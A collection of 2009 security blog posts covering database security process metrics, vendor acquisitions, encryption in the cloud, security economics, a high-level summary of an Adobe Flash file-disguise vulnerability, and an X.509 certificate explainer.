Here’s the thing about that 60 Minutes report on cybersecurity from the other week. Yes, some of the facts were clearly wrong. Yes, there are massive political fights under way to see who ‘controls’ cybersecurity, and how much money they get. Some .gov types might have steered the reporters/producers in the wrong direction. The Brazilian power outage probably wasn’t caused by hackers.
But so what?
Here’s what I do know:
- A penetration tester I know who works on power systems recently told me he has a 100% success rate.
- Multiple large enterprises tell me that hackers, quite possibly from China, are all over their networks stealing sensitive data. They keep as many out as they can, but cannot completely get rid of them.
- Large-scale financial cybercrime is costing us hundreds of millions of dollars – and those are just the ones we know about (some of that is recovered, so I don’t know the true total on an annual basis).
Any other security professional with contacts throughout the industry talks to the same people I do, and has the same information.
The world isn’t ending, but even though the story has some of the facts wrong, the central argument isn’t that far off the mark.
Nick Selby did a great write-up on this, and a bunch of the comments are focused on the nits. While we shouldn’t excuse sloppy journalism, some incorrect facts don’t make the entire story wrong.
Posted at Wednesday 18th November 2009 1:50 pm
(0) Comments •
By Adrian Lane
I had to laugh when I read Alan Shimel’s post “Where does Tipping Point fit in the post-3Com ProCurve”? His comment:
I found it insightful that nowhere among all of this did security or Tipping Point get a mention at all. Does HP realize it is part of this deal?
Which was exactly what I was thinking when reading the press releases. One of 3Com’s three pillars is completely absent from the HP press clippings I’ve come across in the last couple days. Usually there is some mention of everything, to assuage any fears of the employees and avoid having half the headcount leave for ‘new opportunities’. And the product line does not include the all-important cloud or SaaS based models so many firms are looking for, so selling off is a plausible course of action.
It was easy to see why Barracuda purchased Purewire. It filled the biggest hole in their product line. And the entire market has been moving to a hybrid model, outsourcing many of the resource intensive features & functions, and keeping the core email and web security functions in house. This allows customers to reduce cost with the SaaS service and increase the longevity of existing investments.
Cisco’s acquisition of ScanSafe is similar in that it provides customers with a hybrid model to keep existing IronPort customers happy, as well as a pure SaaS web security offering. I could see this being a standard security option for cloud-based services, ultimately a cloud component, and part of a much larger vision than Barracuda’s.
Which gets me back to Tipping Point and Alan’s question “Will they just spin it out, so as not to upset some of their security partners”? My guess is not. If I was
king in charge, I would roll this up with the EDS division acquired earlier this year for a comprehensive managed security services offering. Tipping Point is well entrenched and respected as a product, and both do a lot of business with the government. My guess is this is what they will do. But they need to have the engineering team working on a SaaS offering, and I would like to see them leverage their content analysis capabilities more, and perhaps offer what BlueLane did for VMWare.
Posted at Wednesday 18th November 2009 11:39 am
(0) Comments •
Here’s our first pass at a high-level process framework for Quant for Databases. Patch management is mostly a contiguous process cycle, but database security encompasses a bunch of different processes. This is a framework I originally used in my Pragmatic Database Security presentation (which I really need to go post now).
I realize this is a lot, but database security is a pretty broad topic – from patch management, to auditing, to configuration, to encryption, to masking, to… you get the idea. We believe that the high level process framework presented here is intended to cover all these tasks. We could really use some feedback on how well this encompasses all the database security processes. We based this process on our own experience and research contacts, but want to know how you approach these job functions.
Our next step will be to roll through all the sub-processes within each of these major steps. We don’t plan to get as detailed as we did with patch management. Many of the metrics provided in the original Quant project for patch management were extremely granular since we were dealing with only one process. We still need sufficient granularity to develop meaningful metrics that support process optimization, but at a level that’s a little easier to collect, since we are covering a wider range of functions.
Please keep in mind that our philosophy is to build out a large framework with many options, which individual organizations can then pick and choose from. I know not everyone performs all these steps, but this is the best way to build something that works for organizations of different sizes and verticals.
In this phase we establish our standards and policies to guide the rest of the program. This isn’t a one-time event, since technology and business needs change over time. Standards and policies should be considered for multiple audiences and external requirements.
- Configuration Standards: Develop security and configuration standards for all supported database platforms.
- Classification Policies: Set policies for how data will be classified. Note that we aren’t saying you need complex data classification, but you do need to establish general policies about the importance of different kinds of data (e.g., PCI related, PII, health information) to properly define security and monitoring requirements.
- Authentication, Authorization, and Access Control Policies: Policies around user management and use of accounts – including connection mechanisms, DBA account policies, DB vs. domain vs. local system accounts, and so on.
- Monitoring Policies: Develop security auditing and monitoring policies, which are often closely tied to compliance requirements.
Discover and Assess
In this phase we enumerate (find) our databases, determine what applications use them, what data they contain, and who owns the system and data; then assess the databases for vulnerabilities and secure configurations. One of the more difficult problems in database security is finding and assessing all the databases in the first place.
- Enumerate databases: Find all the databases in your environment. Determine which are relevant to your task.
- Identify applications, owners, and data: Determine who is responsible for the databases, which applications rely on them, and what data they store. One of your primary goals here is to use the application and data to classify the database by importance and sensitivity of information.
- Assess vulnerabilities and configurations: Perform a configuration and vulnerability assessment on the databases.
Based on the results of our configuration and vulnerability assessments, we update and secure the databases. We also lock down access channels and look for any entitlement (user access) issues. All of these requirements may vary based on the policies and standards defined in the Plan phase.
- Patch: Update the database and host platform to the latest security patch level.
- Configure: Securely configure the database in accordance with your configuration standards. This also includes ensuring the host platform meets security configuration requirements.
- Restrict access: Lock down access channels (e.g., review ODBC connections, ensure communications are encrypted), and check user entitlements for any problems, such as default administrative accounts, orphan accounts, or users with excessive privileges.
- Shield: Many databases have their own network security requirements, such as firewalls or VPNs. Although directly managing firewalls is outside the domain of a database security program, you should still engage with network security to make sure systems are properly protected.
This phase consists of database activity monitoring and database auditing. We’ll detail the differences later (you can up on them in the Research Library), but monitoring tends to be focused on granular user activity, while auditing is more concerned with traditional audit logs. Both of these tie into our policies from the Plan phase and vary greatly based on the database involved.
- Database Activity Monitoring: Granular monitoring of database user activity.
- Auditing: Collection, management, and evaluation of database, system, and network audit logs (as relevant to the database).
In this phase we apply preventative controls to protect the data as users and systems interact with it. It includes using Database Activity Monitoring for active alerting, encryption, data masking for data moved to development, and Web Application Firewalls to limit database attacks via web applications.
- Database Activity Monitoring: In the Monitor phase we use DAM to track activity, in this phase we create active policies to generate alerts on violations or even block activity.
- Encryption: Activities to support and maintain encryption/decryption of database data.
- Data masking: Conversion of production data into less sensitive test data for use in development environments.
- Web Application Firewalls: Since many database breaches result from web application attacks, typically SQL injection, we’ve included WAFs to block those attacks. WAFs are one of the only post-application-deployment tools available to directly address database attacks at the application level. (We considered adding additional application security options, but aside from secure development practices, which are well beyond the scope of this project, WAFs are pretty much the only tool designed to actively protect the database.)
The triumvirate of ongoing systems and application management – configuration management, patch management, and change management.
- Configuration management: Keeping systems up to date with configuration standards… including standards that change over time due to new requirements.
- Patch management: Keeping systems up to date with the latest patches.
- Change management: Databases updates on a regular basis; including structural/schema changes, data cleansing, and so on.
Yes – that’s a whole heck of a lot of territory to cover, which is why I stayed fairly terse in this post. In talking with Adrian (who is co-leading this project) we think most organizations lump this activity into 3 buckets/sub-processes:
- Normal database management activities: primarily configuration and patch management – typically managed by database administrators.
- Database assessment.
- Monitoring and auditing.
No, that doesn’t capture everything in the main process, but that’s how most organizations which have database security programs break things out. We have simplified the tasks at the high level, but requirements and policies may come from groups external to database operations – such such as security, privacy, audit, and compliance. If you are a DBA reading this overview process, you could go through this exercise to build out your cost model for simple operations very quickly. The model will hopefully scale just as well for organizations with more complex systems, but will take longer to account for all of your requirements.
This brings up two big questions we could use some help with:
- Does the structure work? You’ll notice I didn’t list this out as one straight process, but as a series of ongoing, overlapping, and related processes.
- Are we missing anything? Should we move anything? Insert, update or delete?
Thanks… in our next posts we’re going to start walking through the model and detailing all the sub-processes so we can come back to them and build out the metrics.
Index to other posts in Project Quant for Database Security.
- An Open Metrics Model for Database Security: Project Quant for Databases.
- Database Security: Process Framework.
- Database Security: Planning.
- Database Security: Planning, Part 2.
- Database Security: Discover and Assess Databases, Apps, Data.
- Database Security: Patch.
- Database Security: Configure.
- Database Security: Restrict Access.
- Database Security: Shield.
- Database Security: Database Activity Monitoring.
- Database Security: Audit.
- Database Security: Database Activity Blocking.
- Database Security: Encryption.
- Database Security: Data Masking.
- Database Security: Web App Firewalls.
- Database Security: Configuration Management.
- Database Security: Patch Management.
- Database Security: Change Management.
- DB Quant: Planning Metrics, Part 1
- DB Quant: Planning Metrics, Part 2
Posted at Wednesday 18th November 2009 10:03 am
(4) Comments •
By Adrian Lane
I was reading PC Magazine’s recap of Ray Ozzie’s announcement of the Azure cloud computing platform.
The vision of Azure, said Ozzie, is “… three screens and a cloud,” meaning Internet-based data and software that plays equally well on PCs, mobile devices, and TVs.
I am already at a stage where almost everything I want to do on the road I can accomplish with my smartphone. Any heavy lifting on the desktop. I am sure we will quickly reach a point where there is no longer a substantial barrier, and I can perform most tasks (with varying degrees of agility) with whatever device I have handy.
“We’re moving into an era of solutions that are experienced by users across PCs, phones and the Web, and that are delivered from datacenters we refer to as private clouds and public clouds.
But I read this just after combing through the BitLocker specifications, and the dichotomy of the old school model and new cloud vision seemed at odds.
With cloud computing we are going to see data encryption become common. We are going to be pushing data into the cloud, where we do know what security will be provided, and we may not have thoroughly screened the contents prior to moving it. Encryption, especially when the data is stored separately from the keys and encryption engine, is a very good approach to keeping data private and secure. But given the generic nature of the computing infrastructure, the solutions will need to be flexible enough to support many different environments.
Microsoft’s data security solution set includes several ways to encrypt data: BitLocker is available for full drive encryption on laptops and workstations. Windows Mobile Device Manager will manage security on your mobile storage and mobile application data encryption. Exchange can manage email and TLS encryption. SQL Server offers transparent and API-level encryption.
But BitLocker’s architecture seems a little odd when compared to the others, especially in light of the cloud based vision. It has hardware and BIOS requirements to run. BitLocker has different key management, key recovery, and backup interfaces than laptops and other mobile devices and applications. BitLocker’s architecture does not seem like it could be stretched to support other mobile devices. Given that this is a major new launch, something a little more platform-neutral would make sense.
If you are an IT manager, do you care? Is it acceptable to you? Does your device security belong to a different group than platform security? The offerings seem scattered to me. Rich does not see this as an issue, as each solves a specific problem relevant to the device in question and key management is localized. I would love to hear your thoughts on this.
I also learned that there is no current plan for Transparent Database Encryption with SQL Azure. That means developers using SQL Azure who want data encryption will need to take on the burden at the application level. This is fine, provided your key management and encryption engine is not in the cloud. But as this is being geared to use with the Azure application platform, you will probably have that in the cloud as well. Be careful.
Posted at Wednesday 18th November 2009 6:33 am
(0) Comments •
By Adrian Lane
Rich and I were on a data security Q&A podcast today. I was surprised when the audience asked questions about Application & Database Monitoring and Protection (ADMP), as it was not on our agenda, nor have we written about it in the last year. When Rich first sketched out the concept, he listed specific market forces behind ADMP, and presented a couple of ADMP models. But these are really technical challenges to management and security and the projected synergies if they are linked. When we were asked about ADMP today, I was able to name a half dozen vendors implementing parts of the model, each with customers who deployed their solution. ADMP is no longer a philosophical discussion of technical synergies but a reality, due to customer acceptance.
I see the evolution of ADMP being very similar to what happened with web and email security. Just a couple years ago there was a sharp division between email security and web security vendors. That market has evolved from the point solutions of email security, anti-virus, email content security, anti-malware, web content filtering, URL filtering, TLS, and gateway services into single platforms. In customer minds the problem is monitoring and controlling how employees use the Internet. The evolution of Symantec, Websense, Proofpoint and Barracuda are all examples, and it is nearly impossible for any collection of technologies to compete with these unified platforms.
ADMP is about monitoring and controlling use of web applications.
A year ago I would have discussed the need for ADMP’s technical benefits, due to having all products under one management interface. The ability to write one policy to direct multiple security functions. The ability for discovery from one component to configure other features. The ability to select the most appropriate tool or feature to address a threat, or even provide some redundancy. ADMP became a reality when customers began viewing web application monitoring and control as a single problem. Successful relationships between database activity monitoring vendors, web app firewalls companies, pen testers, and application assessment firms are showing value and customer acceptance. We have a long, long way to go in linking these technologies together into a robust solution, but the market has evolved a lot over the last 14 months.
Posted at Tuesday 17th November 2009 5:23 pm
(0) Comments •
Thanks to my wife’s job at a hospital, yesterday I was able to finally get my H1N1 flu shot. While driving down, I was also listening to a science podcast talking about the problems when the government last rolled out a big flu vaccine program in the 1970s. The epidemic never really hit, and there was a much higher than usual complication rate with that vaccine (don’t let this scare you off – we’ve had 30 years of improvement since then). The public was justifiably angry, and the Ford administration took a major hit over the situation.
Recently I also read an article about the Y2K “scare”, and how none of the fears panned out. Actually, I think it was a movie review for 2012, so perhaps I shouldn’t take it too seriously.
In many years of being involved with risk-based careers, from mountain rescue and emergency medicine to my current geeky stuff, I’ve noticed a constant trend by majorities to see risk management successes as failures. Rather than believing that the hype was real and we actually succeeded in preventing a major negative event, most people merely interpret the situation as an overhyped fear that failed to manifest. They thus focus on the inconvenience and cost of the risk mitigation, as opposed to its success.
Y2K is probably one of the best examples. I know of many cases where we would have experienced major failures if it weren’t for the hard work of programmers and IT staff. We faced a huge problem, worked our assess off, and got the job done. (BTW – if you are a runner, this Nike Y2K commercial is probably the most awesomest thing ever.)
This behavior is something we constantly wrestle with in security. The better we do our job, the less intrusive we (and the bad guys) are, and the more invisible our successes. I’ve always felt that security should never be in the spotlight – our job is to disappear and not be noticed. Our ultimate achievement is absolute normalcy.
In fact, our most noticeable achievements are failures. When we swoop in to clean up a major breach, or are dangling on the end of a rope hanging off a cliff, we’ve failed. We failed to prevent a negative event, and are now merely cleaning up.
Successful risk management is a failure because the more we succeed, the more we are seen as irrelevant.
Posted at Tuesday 17th November 2009 8:17 am
(1) Comments •
By Adrian Lane
I was working at Unisys two decades ago when I first got into the discussion of what traits, characteristics, or skills to look for in programmer candidates we interviewed. One of the elder team members shocked me when he said he tried to hire musicians regardless of prior programming experience. His feeling was that anyone could learn a language, but people who wrote music understood composition and flow, far harder skills to teach. At the time I thought I understood what he meant, that good code has very little to do with individual statements or programing language used. And the people he hired did make mistakes with the language, but their applications were well thought out. Still, it took 10 years before I fully grasped why this approach worked.
I got to thinking about this today when Rich forwarded me the link to Esther Schindler’s post “If the comments are ugly, the code is ugly”.
Perhaps my opinion is colored by my own role as a writer and editor, but I firmly believe that if you can’t take the time to learn the syntax rules of English (including “its” versus “it’s” and “your” versus “you’re”), I don’t believe you can be any more conscientious at writing code that follows the rules. If you are sloppy in your comments, I expect sloppiness in the code.
Thoughtful and well written, but horseshit none the less! Worse, this is a red herring. The quality of code lies in its suitability to perform the task it was designed to do. The goal should not be to please a spell checker.
Like it or not, there are very good coders who are terrible at putting comments into the code, and what comments they provide are gibberish. They think like coders. They don’t think like English majors. And yes, I am someone who writes like English was my second language, and code like Java was my first. I am just more comfortable with the rules and uses. We call Java and C++ ‘languages’, which seems to invite comparison or cause some to equate these two things. But make no mistake: trying to extrapolate some common metric of quality is simply nuts. It is both a terrible premise, and the wrong perspective for judging a software developer’s skills. Any relevance of human language skill to code quality is purely accidental.
I have gotten to the point in my career where a lack of comments in code can mean the code is of higher quality, not lower. Why? Likely the document first, code later process was followed. When I started working with seasoned architects for the first time, we documented everything long before any code was written. And we had an entire hierarchy of documents, with the first layer covering the goals of the project, the second layer covering the major architectural components and data flow, the third layer covering design issues and choices, and finally documentation at the object level. These documents were checked into the source code control system along with the code objects for reference during development. There were fewer comments in the code, but a lot more information was readily available.
Good programs may have spelling errors in the comments. They may not have comments at all. They may have one or two logic flaws. Mostly irrelevant. I call the above post a red herring because it tries to judge software quality using spelling as a metric, as opposed to more relevant attributes such as:
- The number of bugs in any given module (on a per-developer basis if I can tell).
- The complexity or effort required to fix these bugs.
- How closely the code matches the design specifications.
- Uptime during stress testing.
- How difficult it is to alter or add functionality not provided for in the original design.
- The inclusion of debugging flags and tools.
- The inclusion of test cases with source code.
The number of bugs is far more likely to be an indicator of sloppiness, mis-reading the design specification, bad assumptions, or bogus use cases. The complexity of the fix usually tells me, especially with new code, if the error was a simple mistake or a major screw-up. Logic errors need to be viewed in the same way. Finally, test cases and debugging built into the code are a significant indicator that the coder was thinking about the important data points in the code. Witnessing code behavior has been far more helpful for debugging code than inline comments. Finding ‘breadcrumbs’ and debugging flags is a better indication of a skilled coder than concise grammatically correct comments.
I know some very good architects whose code and comments are sloppy. There are a number of reasons for this, primarily that coding is no longer their primary job. Most follow coding practices because heck, they wrote them. And if they are responsible for peer review this is a form of self preservation and education for their reviewees. But their most important skill is an understanding of business goals, architecture, and 4GL design. These are the people I want laying out my object models. These are the people I want stubbing out objects and prototyping workflow. These are the people I want choosing tools and platforms. Attention to detail is a prized attribute, but some details are more important than others. The better code I have seen comes from those who have the big picture in mind, not those who fuss over coding standards. Comments save time if professional code review (outsourced or peer) is being used, but a design specification is more important than inline comments.
There is another angle to consider here, and that is coding in the open source community is a bit different than working for “The Man”. This is because the eyes of your peers are on you. Not just one or two co-workers, but an entire community. Peer pressure is a great way to get better quality code. Misspellings will earn you a few private email messages pointing out your error, but sloppy programming habits invite public ridicule and scorn. Big motivator.
Still, I maintain in-code comments are of limited value and an old model for development that went out of fashion with Pascal in the enterprise. We have source code control systems that allow us to keep documentation with code segments. Better still, design documents that describe what should be, whereas the code comments describes what ‘is’ and explain the small idiosyncrasies in the implementation because of language, platform, or compatibility limitations.
Spelling as a quality indicator… God, if it were only that easy!
Posted at Monday 16th November 2009 2:48 pm
(8) Comments •
By RichAdrian Lane
One of the more vexing problems in information security is our lack of metrics models for measuring and optimizing security efforts. We tend to lack frameworks and metrics to help measure the efficiency and effectiveness of security programs. This makes it more difficult both to improve our processes, and to communicate our value to non-technical decision makers.
I’m not saying we don’t have any metrics. In recent years we’ve come a long way, with developments such as the Center for Internet Security’s Consensus Metrics and the work of Andrew Jaquith and the Security Metrics community. For the most part these metrics fall into two broad categories: program metrics, and risk/threat models.
One area that has been generally lacking – not to take anything away from the other two categories – is detailed process-oriented models for improving efficiency and effectiveness within specific security areas. In other words, instead of just determining whether a particular process is an overall improvement, such as by measuring time to patch managed systems (efficiency) or percentage of overall systems patched (effectiveness), we lack tools for examining the individual steps within the process for finer-grained changes. Such detailed measurements can help us figure out how much it costs to patch, identify where and why our patching might be slower than desired (and thus how to make it faster), and determine why certain systems fall between the gaps and aren’t patched. Our higher-level models help us evaluate risk and overall security programs, while detailed metrics would be useful for performance optimization.
Our first attempt at building a security performance optimization model focused on patch management, and we called it Project Quant. Over about 6 months we built a standard process framework for patch management, with heavy community participation, and then identified a series of detailed metrics for each step in the process. We ended up with about 40 steps in 10 min phases, with well over 100 potential metrics, prioritized so you can focus on few key areas because few people have the resources to measure them all.
About a month ago we were approached by a database security vendor to see if we could do the same thing for database security. This vendor, Application Security Inc., wanted an open, public, objective framework to measure the potential costs associated with database security. As with the initial Project Quant, which was sponsored by Microsoft, we agreed to proceed with the project as long as we could maintain our Totally Transparent Research policy. In other words, all the work has to be done in public, and the sponsor must participate through the same public mechanisms (comments and forum posts) as anyone else.
This project aligns very well with our research coverage, and we’ve been looking for an excuse to build out more-detailed database security process models for some time now. We also realized the format we used for Project Quant works well for other process-based metrics models. Thus we’re proud to introduce Project Quant for Database Security, and we will now refer to the initial project as Project Quant for Patch Management.
Based on what we have learned to date in Project Quant, this is how the project will proceed:
- We will, with community involvement, build out a high-level process framework for database security (see the patch management cycle for an example).
- Once the high level process looks good, we will build out detailed steps for each phase of the higher-level process, and solicit public feedback and involvement.
- We will build out sub-phase processes that help define tasks, and identify metrics for each step. Metrics will be hard costs in dollars (hardware/software), or time to complete the step. In some cases we will also include some effectiveness metrics (e.g., success vs. failure rates), but the primary focus of the model is costs/efficiency.
- We will classify the metrics by importance and identify key metrics. We learned in the first Project Quant that it’s easy to identify a large number of potential metrics, but most people need only focus on a few that they can measure with a reasonable investment – once again, some metrics are expensive enough to measure that they would be a poor investment for some (or even most) organizations.
- Where possible, we will support the research with open surveys and interviews.
- Absolutely all the research will be conducted out in the open to maintain objectivity. All public comments will be retained as part of the project record, and no comments will be filtered except for spam and off-topic content. The sponsor is only allowed to participate through the same public mechanisms, so their financial involvement can’t influence the result. (As with all our contracts, the sponsor doesn’t have to pay if the result doesn’t meet their needs due to our objectivity requirements).
- Anyone can participate – other security vendors, database and security professionals, database vendors, or anyone with too much time on their hands. If you work for a database or database security vendor, we ask that you disclose the company you are with.
- All materials will be released under a Creative Commons license.
Since database security is more diverse than patch management, we expect to identify multiple sub-processes as part of an overall program. For example, assessment and monitoring aren’t necessarily part of a contiguous cycle like most of the phases of patch management. Because this scope is also wider, we don’t plan on delving into the same level of detail on the metrics as we did with patch management. To be honest, we probably went too deep, and included far more metrics than anyone could reasonably collect using current technologies.
In terms of timeline we are shooting to complete this project around the end of January or early February.
So let us know what you think. We’ll start posting initial thoughts on the process model tomorrow, and start cranking through it from there. We’ll keep all material in the Project Quant site, and will update the Research Library to reflect that we’re now expanding Quant into other security areas. You can find a complete Table of Contents in the Process Framework post.
Posted at Monday 16th November 2009 1:31 pm
(4) Comments •
I was talking with security researcher Mike Bailey over the weekend, and there’s a lot of confusion around his disclosure last week of a combination of issues with Adobe Flash that lead to some worrisome exploit possibilities. Mike posted his original information and an FAQ. Adobe responded, and Mike followed up with more details.
The reason this is a bit confusing is that there are 4 related but independent issues that contribute to the problem.
- Flash ignores file extensions and content headers. The Flash player built into all of our browsers will execute any file that has Flash file headers. This means it ignores HTTP content headers. Some sites assume that content can’t execute because they don’t label it as runnable in the HTML or through the HTTP headers. If they don’t specifically filter the content type, though, and allow a Flash object anywhere in the page, it will run – in their context. Running in context of the containing page/site is expected, but execution despite content labeling is often unexpected and can be dangerous. Now most sites filter or otherwise mark images and some other major uploadable content types, but if they have a field for a .zip file or a document, unless they filter it (and many sites do) the content will run.
- Flash files can impersonate other file types. A bad guy can take a Flash program, append a .zip file, and give it a .zip file extension. To any ZIP parser, that’s a valid zip file, and not a Flash file. This also applies to other file types, such as the .docx/pptx/xlsx zipped XML formats preferred by current versions of MS Office. As I mentioned in the second point, many servers screen potentially-unsafe file types such as zip. Such hybrid files are totally valid zip archives, but simultaneously executable Flash files. If the site serves up such a file, (as many bulletin boards and code-sample sites do), the Flash plugin will manage to recognize and execute the Flash component, even though it looks more like a zip file to humans and file scanners.
Thus we have four problems – three of which Adobe can fix – that create new exploit scenarios for attackers. Attackers can sneak Flash files into places where they shouldn’t run, and can design these malicious applications to allow them to manipulate the hosting site in ways that shouldn’t be possible. This works on some common platforms if they enable file uploads (Joomla, Drupal), as well as some of the sites Mike references in his posts.
This isn’t an end-of-the-world kind of problem, but is serious enough that Adobe should address it. They should force Flash to respect HTTP headers, and could easily filter out “disguised” Flash files. Flash should also respect the same origin policy, and not allow the hosting site to affect the presenting site.
This issue is definitely more serious than Adobe is saying, and hopefully they’ll change their position and fix the parts of it that are under their control.
Posted at Monday 16th November 2009 10:39 am
(1) Comments •
By David Mortman
I recently had the pleasure to present at a local CIO conference. There were about 50 CIOs in the room, ranging from .edu folks, to start-ups, to the CIOs of major enterprises including a large international bank and a similarly large insurance company. While the official topic for the event was “the cloud”, there was a second underlying theme – that CIOs needed to learn how to talk to the business folks on their terms and also how to make sure that IT wasn’t being a roadblock but rather an enabler of the business. There was a lot of discussion and concern about the cloud in general – driven by business’ ability to take control of infrastructure away from IT – so while everybody agreed that communicating with the business should always have been a concern, the cloud has brought this issue to the fore.
This all sounds awfully familiar, doesn’t it? For a while now I’ve been advocating that we as an industry need to be doing a better job communicating with the business and I stand behind that argument today. But I hadn’t realized how fortunate I was to work with several CIOs who had already figured it out. It’s now pretty clear to me that many CIOs are still struggling with this, and that it is not necessarily a bad thing. It means, however, that while the CIO is still an ally as you work to communicate better with the business, it is now important to keep in mind that the CIO might be more of a direct partner rather than a mentor. Either way, having someone to work with on improving your messaging is important – it’s like having an editor (Hi Chris!) when writing. That second set of eyes is really important for ensuring the message is clear and concise.
Posted at Monday 16th November 2009 9:51 am
(1) Comments •
We talk a lot about the role of anonymization on the Internet. On one hand, it’s a powerful tool for freedom of speech. On the other, it creates massive security challenges by greatly reducing attackers’ risk of apprehension.
The more time I spend in security, the more I realize that economics plays a far larger role than technology in what we do.
Anonymization, combined with internationalization, shifts the economics of online criminal activity. In the old days to rob or hurt someone you needed a degree of physical access. The postal and phone systems reduced the need for this access, but also contain rate-limiters that reduce scalability of attacks. Physical access corresponds to physical risk – particularly the risk of apprehension. A lack of sufficient international cooperation (or even consistent international laws), combined with anonymity, and the scope and speed of the Internet, skew the economics in favor of the bad guys. There is a lower risk of capture, a lower risk of prosecution, limited costs of entry, and a large (global) scope for potential operations.
Heck, with economics like that, I feel like an idiot for not being a cybercriminal.
In security circles we spend a lot of time talking about the security issues of anonymity and internationalization, but these really aren’t the problem. The real problem isn’t the anonymity of users, but the anonymity of losses.
When someone breaks into your house, you know it. When a retailer loses inventory to shrinkage, the losses are directly attributable to that part of the supply chain, and someone’s responsible. But our computer security losses aren’t so clear, and in fact are typically completely hidden from the asset owner. Banking losses due to hacking are spread throughout the system, with users rarely paying the price.
Actually, that statement is completely wrong. We all pay for this kind of fraud, but it’s hidden from us by being spread throughout the system, rather than tied to specific events. We all pay higher fees to cover these losses. Thus we don’t notice the pain, don’t cry out for change, and don’t change our practices. We don’t even pick our banks or credit cards based on security any more, since they all appear the same.
Losses are also anonymized on the corporate side. When an organization suffers a data breach, does the business unit involved suffer any losses? Do they pay for the remediation out of their departmental budget? Not in any company I’ve ever worked with – the losses are absorbed by IT/security.
Our system is constructed in a manner that completely disrupts the natural impact of market forces. Those most responsible for their assets suffer minimal or no direct pain when they experience losses. Damages are either spread through the system, or absorbed by another cost center.
Now imagine a world where we reverse this situation. Where consumers are responsible for the financial losses associated with illicit activity in their accounts. Where business unit managers have to pay for remediation efforts when they are hacked. I guarantee that behavior would quickly change.
The economics of security fail because the losses are invisibly transfered away from those with the most responsibility. They don’t suffer the pain of losses, but they do suffer the pain/inconvenience of security. On top of that, many of the losses are nearly impossible to measure, even if you detect them (non-regulated data loss). No wonder they don’t like us.
Security professionals ask me all the time when users will “get it”, and management will “pay attention”. We don’t have a hope of things changing until those in charge of the purse strings start suffering the pain associated with security failures.
It’s just simple economics.
Posted at Friday 13th November 2009 1:33 pm
(2) Comments •
I have to be honest. I’m getting tired of this whole “security is failing, security professionals suck” meme.
If the industry was failing that badly all our bank accounts would be empty, we’d be running on generators, our kids would all be institutionalized due to excessive exposure to porn, email would be dead, and all our Amazon orders would be rerouted to Liberia… but would never show up because of all the falling planes crashing into sinking cargo ships.
I’m not going to say we don’t have serious problems! We do, but we are also far from complete failure. Just as any retail supply chain struggles with shrinkage (theft), any organization of sufficient size will struggle with data shrinkage and security penetrations.
Are we suffering losses? Hell, yes. Are they bad? Most definitely. But these losses clearly haven’t hit the point where the pain to society has sufficiently exceeded our tolerance. Partially I think this is because the losses are unevenly distributed and hidden within the system, but that’s another post. I don’t know where the line is that will kick the world into action, but suspect it might involve sudden unavailability of Internet porn and LOLCats email.
Those of us deeply embedded within the security industry forget that the vast majority of people responsible for IT security across the world aren’t necessarily in dedicated positions within large enterprises. I’d venture a bet that if we add up all the 1-2 person security teams in SMB (many only doing security part-time), and other IT professionals with some security responsibilities, that number would be a pretty significant multiple of all the CISSPs and SANS graduates in the world.
It’s ridiculous for us to tell these folks that they are failing. They are slammed with day to day operational tasks, with no real possibility of ever catching up. I heard someone say at Gartner once that if we froze the technology world today, buying no new systems and approving no new projects, it would still take us 5 years to catch up.
Security professionals have evolved… they just have far too much to deal with on a daily basis. We also forget that, as with any profession, most of the people in it just want to do their jobs and go home at night, perhaps 10% are really good and always thinking about it, and at least 30% are lazy and suck. I might be too generous with that 30% number.
Security, and security professionals, aren’t failing. We lose some battles and win others, and life goes on. At some point the world feels enough pain and we get more resources to respond. Then we reduce that pain to an acceptable level, and we’re forgotten again.
That said, I do think life will be more interesting once losses aren’t hidden within the system (and I mean inside all kinds of businesses, not just the financial world). Once we can tie data loss to pain, perhaps priorities will shift. But that’s for another post…
On to the Summary:
Webcasts, Podcasts, Outside Writing, and Conferences
Favorite Securosis Posts
Other Securosis Posts
Favorite Outside Posts
Top News and Posts
Blog Comment of the Week
This week’s best comment comes from Mike Rothman in response to Compliance vs. Security:
Wow. Hard to know where to start here. There is a lot to like and appreciate about Corman’s positions. Security innovation has clearly suffered because organizations are feeding the compliance beast. Yes, there is some overlap - but it’s more being lucky than good when a compliance mandate actually improves security.
The reality is BOTH security and compliance do not add value to an organization. I’ve heard the “enabling” hogwash for years and still don’t believe it. That means organizations will spend the least amount possible to achieve a certain level of “risk” mitigation - whether it’s to address security threats or compliance mandates. That is not going to change.
What Josh is really doing is challenging all of us to break out of this death spiral, where we are beholden to the compliance gods and that means we cannot actually protect much of anything. Compliance is and will remain years behind the real threats.
Posted at Thursday 12th November 2009 9:52 pm
(1) Comments •
By Adrian Lane
A couple weeks ago, we began an internal discussion about DNS security and X.509 certificates. It dawned on me that those of you who have never worked with certificates may not understand what they are or what they are for. Sure, you can go to the X.509 Wiki, where you get the rules for usage and certificate structure, but that’s a little like trying to figure out football by reading the rule book. If you are asking, “What the heck is it and what is it used for?”, you are not alone.
An X.509 certificate is used to make an authoritative statement about something. A real life equivalent would be “Hi, I’m David, and I live at 555 Main Street.” The certificate holder presents it to someone/something in order to prove they are who they say they are, in order to establish trust. X.509 and other certificates are useful because the certificate provides the necessary information to validate the presenter’s claim and the authenticate the certificate itself. Like a driver’s license with a hologram, but much better. The recipient examines the certificate’s contents to decide if the presenter is who they say they are, and them whether to trust them with some privilege.
Certificates are used primarily to establish trust on the web, and rely heavily on cryptography to provide the built-in validation. Certificates are always signed with a chain of authority. If the root of the chain is trusted, the user or application can extend that level of trust to some other domain/server/user. If the recipient doesn’t already trust the top signing authority, the certificate is ignored and no trust is established. In a way, an x.509 certificate is a basic embodiment of data centric security, as it contains both information and some rules of use.
Most certificates state within themselves what they are used for, and yes, they can be used for purposes other than validating web site identity/ownership, but in practice we don’t see diverse uses of X.509 certificates. You will hear that X.509 is an old format, that it’s not particularly flexible or adaptable. All of which is true and why we don’t see it used very often in different contexts. Considering that X.509 certificates are used primarily for network security, but were designed a decade before most people had even heard of the Internet, they have worked considerably better than we had any right to expect.
Posted at Thursday 12th November 2009 4:12 pm
(0) Comments •
I just read about some Georgia Tech researchers working on remote security techniques that carriers could use to help manage attacks on cell phones.
Years ago I used to focus on a similar issue: how mobile malware was something that carriers would eventually be responsible for stopping, and that’s why we wouldn’t really need AV on our phones. That particular prediction was clearly out of date before the threat ever reared its ugly head.
These days our phones are connected nearly as much to WiFi, Bluetooth, and other networks as they are to the carrier’s network. Thus it isn’t hard to see malware that checks to see which network interface is active before sending out any bad packets (DDOS is much more effective over WiFi than EDGE/3G anyway). This could circumvent the carrier, leaving malware to propagate over local networks.
